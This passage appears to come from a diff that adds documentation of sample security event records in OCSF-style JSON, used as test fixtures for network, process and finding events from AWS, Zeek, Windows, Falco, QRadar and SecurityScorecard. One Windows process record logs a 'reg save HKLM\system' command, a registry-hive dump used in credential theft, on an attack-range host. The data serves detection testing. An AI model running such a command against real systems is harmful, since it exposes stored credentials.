"FR" + }, + "svc_name": "APIGW", + "uid": "EXAMPLE11:rjvegx5guh:CanaryTest" + }, + "time": 0, + "type_name": "HTTP Activity: Get", + "type_uid": 400203, + "unmapped": [ + [ + "rateBasedRuleList[].rateBasedRuleId", + "..." + ], + [ + "rateBasedRuleList[].customValues[].value", + "ella" + ], + [ + "rateBasedRuleList[].customValues[].name", + "dogname" + ], + [ + "rateBasedRuleList[].limitKey", + "CUSTOMKEYS" + ], + [ + "rateBasedRuleList[].customValues[].key", + "HEADER" + ], + [ + "httpRequest.headers[].value", + "52.46.82.45,https,443,rjvegx5guh.execute-api.eu-west-3.amazonaws.com,Root=1-645566cf-7cb058b04d9bb3ee01dc4036,ella,RateBasedRuleTestKoipOneKeyModulePV2,gzip,deflate" + ], + [ + "rateBasedRuleList[].rateBasedRuleName", + "RateBasedRule" + ], + [ + "rateBasedRuleList[].maxRateAllowed", + "100" + ], + [ + "httpRequest.headers[].name", + "X-Forwarded-For,X-Forwarded-Proto,X-Forwarded-Port,Host,X-Amzn-Trace-Id,dogname,User-Agent,Accept-Encoding" + ] + ] + } + ``` + + + +=== "test_network_activity_1" + + + ```json + { + "cloud": { + "account_uid": "987654321098", + "region": "us-west-2", + "zone": "use2-az2", + "provider": "AWS" + }, + "action": "Allowed", + "action_id": 1, + "status_code": "OK", + "traffic": { + "bytes": 85, + "packets": 10 + }, + "src_endpoint": { + "ip": "192.168.1.10", + "port": 8080, + "svc_name": "amazon-s3", + "subnet_uid": "subnet-33333333333333333", + "vpc_uid": "vpc-44444444444444444" + }, + "dst_endpoint": { + "ip": "192.168.1.20", + "port": 443, + "svc_name": "amazon-ec2", + "interface_uid": "eni-22222222222222222", + "instance_uid": "i-111111111111111111" + }, + "connection_info": { + "protocol_num": 17, + "protocol_ver": "IPv6", + "tcp_flags": 6, + "direction": "egress", + "direction_id": 2, + "boundary_id": 99, + "boundary": "vpn", + "start_time": 1653200123, + "end_time": 1653200100 + }, + "time": 1653200100, + "type_name": "Network Activity: Traffic", + "type_uid": 400105, + "activity_id": 5, + "activity_name": "Traffic", + "class_uid": 4001, + "class_name": "Network Activity", + "category_uid": 4, + "category_name": "Network Activity", + "metadata": { + "product": { + "name": "Amazon VPC", + "feature": { + "name": "Flowlogs" + }, + "vendor_name": "AWS" + }, + "profiles": [ + "cloud", + "security_control" + ], + "version": "1.1.0" + }, + "severity_id": 1, + "severity": "Informational", + "status_id": 1, + "status": "Success", + "disposition": "Allowed", + "pkt_src_aws_service": "amazon-s3", + "pkt_dst_aws_service": "amazon-ec2", + "sublocation_type": "subnet", + "sublocation_id": "subnet-33333333333333333" + } + ``` + + + +=== "test_network_activity_2" + + + ```json + { + "action": "Denied", + "action_id": 2, + "activity_id": 5, + "activity_name": "Refuse", + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "Network Activity", + "class_uid": 4001, + "cloud": { + "account": { + "uid": "123456789012" + }, + "provider": "AWS", + "region": "us-east-1", + "zone": "use1-az1" + }, + "connection_info": { + "boundary": "-", + "boundary_id": 99, + "direction": "Inbound", + "direction_id": 1, + "protocol_num": 6, + "protocol_ver": "IPv4", + "tcp_flags": 2 + }, + "disposition": "Blocked", + "dst_endpoint": { + "instance_uid": "i-000000000000000000", + "interface_uid": "eni-000000000000000000", + "ip": "172.31.2.52", + "port": 39938, + "subnet_uid": "subnet-000000000000000000", + "svc_name": "-", + "vpc_uid": "vpc-00000000" + }, + "end_time_dt": "2022-04-11T20:03:08.000-04:00", + "metadata": { + "product": { + "feature": { + "name": "Flowlogs" + }, + "name": "Amazon VPC", + "vendor_name": "AWS", + "version": "5" + }, + "profiles": [ + "cloud", + "security_control", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "dst_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "172.31.2.52" + }, + { + "name": "dst_endpoint.instance_uid", + "type": "Resource UID", + "type_id": 10, + "value": "i-000000000000000000" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "1.2.3.4" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "1.2.3.4", + "port": 56858, + "svc_name": "-" + }, + "start_time_dt": "2022-04-11T20:02:12.000-04:00", + "status_code": "OK", + "time": 1649721732000, + "time_dt": "2022-04-11T20:02:12.000-04:00", + "traffic": { + "bytes": 40, + "packets": 1 + }, + "type_name": "Network Activity: Refuse", + "type_uid": 400105, + "unmapped": { + "sublocation_id": "-", + "sublocation_type": "-" + } + } + ``` + + + +=== "test_network_activity_3" + + + ```json + { + "activity_name": "Traffic", + "activity_id": 6, + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "Network Activity", + "class_uid": 4001, + "type_uid": 400106, + "type_name": "Network Activity: Traffic", + "severity_id": 1, + "severity": "Informational", + "start_time": "2015/06/17T00:00:00.083", + "end_time": "2015/06/17T00:00:00.089", + "duration": 0.006, + "metadata": { + "product": { + "version": "3.9.0", + "name": "SiLK", + "feature": { + "name": " Network Flow Data" + }, + "vendor_name": "CERT/NetSA at Carnegie Mellon University - Software Engineering Institute" + }, + "version": "1.0.0-rc.3" + }, + "src_endpoint": { + "port": 63975, + "ip": "192.168.40.20" + }, + "dst_endpoint": { + "port": 443, + "ip": "10.0.40.21" + }, + "connection_info": { + "protocol_num": 6, + "tcp_flags": 19, + "boundary_id": 99, + "boundary": "Other", + "direction_id": 2, + "direction": "Outbound" + }, + "traffic": { + "packets": 8, + "bytes": 344 + }, + "unmapped": { + "sensor": "S1", + "in": 0, + "out": 0, + "nhIP": "0.0.0.0", + "initialFlags": "", + "sessionFlags": "", + "attributes": "", + "application": 0, + "class": "all", + "type": "outweb", + "iType": "", + "iCode": "" + } + } + ``` + + + +=== "test_network_activity_4" + + + ```json + { + "time": 1591367999.305988, + "uuid": "CMdzit1AMNsmfAIiQc", + "src_endpoint": { + "ip": "192.168.4.76", + "port": 36844 + }, + "dst_endpoint": { + "ip": "192.168.4.1", + "port": 53 + }, + "connection_info": { + "protocol_name": "udp" + }, + "bytes_in": 62, + "packets_in": 2, + "orig_bytes": { + "ip": 118 + }, + "bytes_out": 141, + "packets_out": 2, + "resp_bytes": { + "ip": 197 + }, + "duration": 0.06685185432434082, + "unmapped": { + "conn_state": "SF" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "conn.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1, + "proposed_new_attributes": { + "application_protocol": "dns", + "bytes_missed": 0, + "connection_history": "Dd" + } + } + ``` + + + +=== "test_network_activity_5" + + + ```json + { + "time": 1591367999.305988, + "uuid": "CMdzit1AMNsmfAIiQc", + "src_endpoint": { + "ip": "192.168.4.76", + "port": 36844 + }, + "dst_endpoint": { + "ip": "192.168.4.1", + "port": 53 + }, + "connection_info": { + "protocol_name": "udp" + }, + "bytes_in": 62, + "packets_in": 2, + "orig_bytes": { + "ip": 118 + }, + "bytes_out": 141, + "packets_out": 2, + "resp_bytes": { + "ip": 197 + }, + "duration": 0.06685185432434082, + "unmapped": { + "conn_state": "SF" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "conn.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1, + "proposed_new_attributes": { + "application_protocol": "dns", + "bytes_missed": 0, + "connection_history": "Dd" + } + } + ``` + + + +=== "test_network_activity_6" + + + ```json + { + "time": 1598377391.921726, + "uuid": "CsukF91Bx9mrqdEaH9", + "src_endpoint": { + "ip": "192.168.4.49", + "port": 56718 + }, + "dst_endpoint": { + "ip": "13.32.202.10", + "port": 443 + }, + "version": "TLSv12", + "cipher": "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", + "certificate": "secp256r1", + "domain": "www.taosecurity.com", + "certificate_chain": [ + "F2XEvj1CahhdhtfvT4", + "FZ7ygD3ERPfEVVohG9", + "F7vklpOKI4yX9wmvh", + "FAnbnR32nIIr2j9XV" + ], + "subject": "CN=www.taosecurity.com", + "issuer": "CN=Amazon,OU=Server CA 1B,O=Amazon,C=US", + "unmapped": { + "next_protocol": "h2", + "resumed": false + }, + "network_activity": { + "status_id": "1" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "ssl.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1 + } + ``` + + + +=== "test_process_activity_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Launch", + "actor": { + "process": { + "file": { + "name": "cmd.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\cmd.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 3948 + }, + "session": { + "uid": "0x55E621" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "ATTACKRANGE", + "name": "Administrator", + "uid": "ATTACKRANGE\\Administrator" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Process Activity", + "class_uid": 1007, + "device": { + "hostname": "win-dc-725.attackrange.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "message": "A new process has been created.", + "metadata": { + "original_time": "03/12/2021 10:48:14 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "a47bd2fb-4da1-4378-8961-81f81f90aec2", + "version": "1.0.0-rc.2" + }, + "process": { + "cmd_line": "reg save HKLM\\system C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\system ", + "file": { + "name": "reg.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\reg.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 4696, + "session": { + "uid": "0x0" + }, + "user": { + "domain": "-", + "name": "-", + "uid": "NULL SID" + } + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1615564094000, + "type_name": "Process Activity: Launch", + "type_uid": 100701, + "unmapped": { + "EventCode": "4688", + "EventType": "0", + "OpCode": "Info", + "Process Information": { + "Mandatory Label": "Mandatory Label\\High Mandatory Level", + "Token Elevation Type": "%%1936" + }, + "RecordNumber": "257874", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Process Creation" + } + } + ``` + + + +=== "test_process_activity_2" + + + ```json + { + "activity_id": 2, + "activity_name": "Terminate", + "actor": { + "process": { + "file": { + "name": "auditon.exe", + "parent_folder": "C:\\Generate_Security_Events1", + "path": "C:\\Generate_Security_Events1\\auditon.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 1524 + }, + "session": { + "uid": "0x1806d9" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "LOGISTICS", + "name": "Administrator", + "uid": "S-1-5-21-1135140816-2109348461-2107143693-500" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Process Activity", + "class_uid": 1007, + "device": { + "hostname": "dcc1.Logistics.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "exit_code": 0, + "message": "A process has exited.", + "metadata": { + "original_time": "09/05/2019 11:22:49 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "cc27b41c-94e0-48a9-8cc2-5a1598fb8d1f", + "version": "1.0.0-rc.2" + }, + "process": { + "file": { + "name": "auditon.exe", + "parent_folder": "C:\\Generate_Security_Events1", + "path": "C:\\Generate_Security_Events1\\auditon.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 1524 + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1567696969000, + "type_name": "Process Activity: Terminate", + "type_uid": 100702, + "unmapped": { + "EventCode": "4689", + "EventType": "0", + "OpCode": "Info", + "RecordNumber": "6828379", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Process Termination" + } + } + ``` + + + +=== "test_security_finding_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "classname": "Security Finding", + "class_uid": 2001, + "finding": { + "created_time": 1672758699558, + "desc": "Linux Kernel Module injection using insmod detected (user=%user.name user_loginuid=%user.loginuid parent_process=%proc.pname module=%proc.args %container.info image=%container.image.repository:%container.image.tag)", + "title": "Linux Kernel Module Injection Detected", + "types": [ + "syscalls" + ], + "uid": "ec834826-90c1-458a-8eec-a014e7266754" + }, + "message": "Linux Kernel Module Injection Detected", + "metadata": { + "version": "0.1.0", + "product": { + "vendor_name": "Falcosecurity", + "name": "Falco" + }, + "labels": [ + "process" + ] + }, + "observables": [ + { + "name": "hostname", + "type": "Other", + "type_id": 0, + "value": "host0.local" + }, + { + "name": "proc.pname", + "type": "Other", + "type_id": 0, + "value": "proc.pname" + }, + { + "name": "container.info", + "type": "Other", + "type_id": 0, + "value": "container.info" + }, + { + "name": "proc.args", + "type": "Other", + "type_id": 0, + "value": "proc.args" + }, + { + "name": "user.loginuid", + "type": "Other", + "type_id": 0, + "value": "user.loginuid" + }, + { + "name": "user.name", + "type": "Other", + "type_id": 0, + "value": "user.name" + }, + { + "name": "container.image.repository", + "type": "Other", + "type_id": 0, + "value": "container.image.repository" + }, + { + "name": "container.image.tag", + "type": "Other", + "type_id": 0, + "value": "container.image.tag" + } + ], + "raw_data": "{\"uuid\":\"ec834826-90c1-458a-8eec-a014e7266754\",\"output\":\"Linux Kernel Module injection using insmod detected (user=%user.name user_loginuid=%user.loginuid parent_process=%proc.pname module=%proc.args %container.info image=%container.image.repository:%container.image.tag)\",\"priority\":\"Warning\",\"rule\":\"Linux Kernel Module Injection Detected\",\"time\":\"2023-01-03T15:11:39.558068644Z\",\"output_fields\":{\"akey\":\"AValue\",\"bkey\":\"BValue\",\"ckey\":\"CValue\",\"container.image.repository\":\"container.image.repository\",\"container.image.tag\":\"container.image.tag\",\"container.info\":\"container.info\",\"dkey\":\"bar\",\"proc.args\":\"proc.args\",\"proc.pname\":\"proc.pname\",\"user.loginuid\":\"user.loginuid\",\"user.name\":\"user.name\"},\"source\":\"syscalls\",\"tags\":[\"process\"],\"hostname\":\"host0.local\"}", + "severity": "Medium", + "severity_id": 3, + "state": "New", + "state_id": 1, + "status": "Warning", + "time": 1672758699558, + "type_name": "Security Finding: Generate", + "type_uid": 200101 + } + ``` + + + +=== "test_security_finding_2" + + + ```json + { + "analytic": { + "desc": "Custom Rule Engine", + "name": "CRE", + "relatedAnalytics": [ + { + "category": "CRE_RULE", + "name": "Network DoS Attack Detected", + "type": "Rule", + "typeId": 1, + "uid": "100079" + } + ], + "type": "Rule", + "typeId": 1 + }, + "finding": { + "uid": "591", + "title": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt\n", + "created_time": 1682347463218, + "desc": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt\n", + "first_seen_time": 1682347463000, + "last_seen_time": 1682781010000 + }, + "confidence_score": 2, + "confidence": "Low", + "confidence_id": 2, + "data_sources": [ + "Snort @ wolverine" + ], + "impact_score": 0, + "impact": "Low", + "impact_id": 1, + "malware": [ + { + "classification_ids": [ + 5 + ], + "classifications": [ + "DDOS" + ], + "name": "ICMP DoS" + } + ], + "risk_level": "High", + "risk_level_id": 3, + "risk_score": 3, + "state": "In Progress", + "state_id": 2, + "activity_id": 1, + "category_uid": 2, + "class_uid": 2001, + "time": 1682347463218, + "message": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt\n", + "metadata": { + "log_name": "Offense", + "log_provider": "IBM QRadar", + "original_time": 1682347463218, + "product": { + "lang": "en", + "name": "QRadar SIEM", + "version": "7.5.0", + "vendor_name": "IBM" + }, + "version": "7.5.0", + "modified_time": 1682347469220 + }, + "activity_name": "Create", + "category_name": "Findings", + "class_name": "Security Finding", + "count": 2, + "end_time": 1682781010000, + "enrichments": [ + { + "name": "Magnitude", + "provider": "Event Processor", + "type": "score", + "value": "3" + }, + { + "name": "offense_type", + "provider": "Event Processor", + "type": "correlation", + "value": "2" + }, + { + "name": "offense_source", + "provider": "Event Processor", + "type": "correlation", + "value": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt" + }, + { + "name": "category_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "device_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "event_count", + "provider": "Event Processor", + "type": "counter", + "value": "2" + }, + { + "name": "flow_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "policy_category_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "remote_destination_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "local_destination_count", + "provider": "Event Processor", + "type": "counter", + "value": "2" + }, + { + "name": "security_category_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "source_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "user_name_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "domain_id", + "provider": "Event Processor", + "type": "correlation", + "value": "0" + }, + { + "name": "source_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-99-99-99.Net_99_0_0_0" + }, + { + "name": "destination_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-88-88-88.Net_88_88_0_0" + }, + { + "name": "destination_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-77-77-77.Net_77_0_0_0" + } + ], + "observables": [ + { + "name": "log_source_id", + "type": "Other", + "type_id": 99, + "value": "112" + }, + { + "name": "log_source_name", + "type": "Other", + "type_id": 99, + "value": "Snort @ wolverine" + }, + { + "name": "log_source_type_id", + "type": "Other", + "type_id": 99, + "value": "2" + }, + { + "name": "log_source_type_name", + "type": "Other", + "type_id": 99, + "value": "Snort" + }, + { + "name": "assigned_to", + "type": "User", + "type_id": 21, + "value": "SomeUser" + }, + { + "name": "low_level_category", + "type": "Other", + "type_id": 99, + "value": "ICMP DoS" + }, + { + "name": "source_address", + "type": "IP Address", + "type_id": 2, + "value": "99.99.99.99" + }, + { + "name": "local_destination_address", + "type": "IP Address", + "type_id": 2, + "value": "88.88.88.88" + }, + { + "name": "local_destination_address", + "type": "IP Address", + "type_id": 2, + "value": "77.77.77.77" + } + ], + "status_code": "OPEN" + } + ``` + + + +=== "test_security_finding_3" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.openinternet", + "provider": "SecurityScorecard", + "uid": "pva.torrent.openinternet_9d153be3-a48e-4498-b476-18c2a847d214" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"-\",\"enc_host\":\"open-internet.nl\",\"enc_raw_header\":\"-\",\"enc_request\":\"SOCKET_UDP%20%2F\",\"enc_request_body\":\"AAAEFycQGYAAAAAAiWPgag==\",\"family\":\"pva.torrent.openinternet\",\"field_1\":\"2022-06-27T01:37:06.385325 version_5\",\"remote_addr\":\"1.183.190.110\",\"remote_port\":\"2048\",\"remote_user\":\"-\", \"status\":\"200\",\"time_local\":\"2022-06-27T01:36:21.515207\"}", + "message": "Potentially vulnerable application infection detected on IP address 1.183.190.110 by Malware DNS sinkhole on communication domain for sinkholed domain open-internet.nl", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199945, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199945, + "original_time": "2022-11-15T17:59:59.945Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 1.183.190.110 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "chinatelecom.cn", + "uid": "1.183.190.110" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "1.183.190.110" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "open-internet.nl" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.openinternet" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "2048" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Bieligutai, China" + } + ], + "finding": { + "title": "Infection found on 1.183.190.110", + "uid": "2b7908d7-4b72-4f65-afa0-09bdaea46ae3", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.openinternet" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/1.183.190.110", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199945, + "desc": "Potentially vulnerable application infection detected on IP address 1.183.190.110 communicating with Command-and-Control domain open-internet.nl" + } + } + ``` + + + +=== "test_security_finding_4" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.openinternet", + "provider": "SecurityScorecard", + "uid": "pva.torrent.openinternet_e1472f25-0d2d-4b88-aac9-b7bd439218f5" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"-\",\"enc_host\":\"open-internet.nl\",\"enc_raw_header\":\"-\",\"enc_request\":\"SOCKET_UDP%20%2F\",\"enc_request_body\":\"AAAEFycQGYAAAAAAtdIQjw==\",\"family\":\"pva.torrent.openinternet\",\"field_1\":\"2022-06-04T10:35:07.143255 version_5\",\"remote_addr\":\"59.11.81.231\",\"remote_port\":\"6927\",\"remote_user\":\"-\", \"status\":\"200\",\"time_local\":\"2022-06-04T10:34:45.835005\"}", + "message": "Potentially vulnerable application infection detected on IP address 59.11.81.231 by Malware DNS sinkhole on communication domain for sinkholed domain ", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199946, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199946, + "original_time": "2022-11-15T17:59:59.946Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 59.11.81.231 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "krnic.or.kr", + "uid": "59.11.81.231" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "59.11.81.231" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": null + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.openinternet" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "6927" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Seongnam-si (Buljeong-ro), Korea, Republic of" + } + ], + "finding": { + "title": "Infection found on 59.11.81.231", + "uid": "45521c66-6498-442d-ad9b-40da9f0e9236", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.openinternet" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/59.11.81.231", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199947, + "desc": "Potentially vulnerable application infection detected on IP address 59.11.81.231 communicating with Command-and-Control domain " + } + } + ``` + + + +=== "test_security_finding_5" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.kickasstracker", + "provider": "SecurityScorecard", + "uid": "pva.torrent.kickasstracker_d605642d-9f8b-46ed-bb19-882ffc34a8f4" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"152\",\"enc_host\":\"open.kickasstracker.com\",\"enc_raw_header\":\"R0VUIC9zY3JhcGU/aW5mb19oYXNoPSUwMiUyNSVkYiVmMiVmZlElZWVLJTNmJWMxJTI4MW8lMGMlMDklYWElODN4JWVlJTk5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBUcmFuc21pc3Npb24vMi44NA0KSG9zdDogb3Blbi5raWNrYXNzdHJhY2tlci5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXA7cT0xLjAsIGRlZmxhdGUsIGlkZW50aXR5DQoNCg==\",\"enc_request\":\"GET%20%2Fscrape%3Finfo_hash%3D%2502%2525%25db%25f2%25ffQ%25eeK%253f%25c1%25281o%250c%2509%25aa%2583x%25ee%2599%20HTTP%2F1.1\",\"enc_request_body\":\"\",\"family\":\"pva.torrent.kickasstracker\",\"field_1\":\"2022-09-30T21:26:09.028507 version_5\",\"remote_addr\":\"190.109.227.80\",\"remote_port\":\"21886\",\"remote_user\":\"-\", \"status\":\"404\",\"time_local\":\"2022-09-30T21:25:21+00:00\"}", + "message": "Potentially vulnerable application infection detected on IP address 190.109.227.80 by Malware DNS sinkhole on communication domain for sinkholed domain open.kickasstracker.com", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199947, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199947, + "original_time": "2022-11-15T17:59:59.947Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 190.109.227.80 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "cotel.bo", + "uid": "190.109.227.80" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "190.109.227.80" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "open.kickasstracker.com" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.kickasstracker" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "21886" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "La Paz (Macrodistrito Centro), Bolivia, Plurinational State of" + } + ], + "finding": { + "title": "Infection found on 190.109.227.80", + "uid": "8f91e92d-b75c-4d55-a6a2-c9f611cdea28", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.kickasstracker" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/190.109.227.80", + "remediation": { + "desc": "If this IP address is tied to your 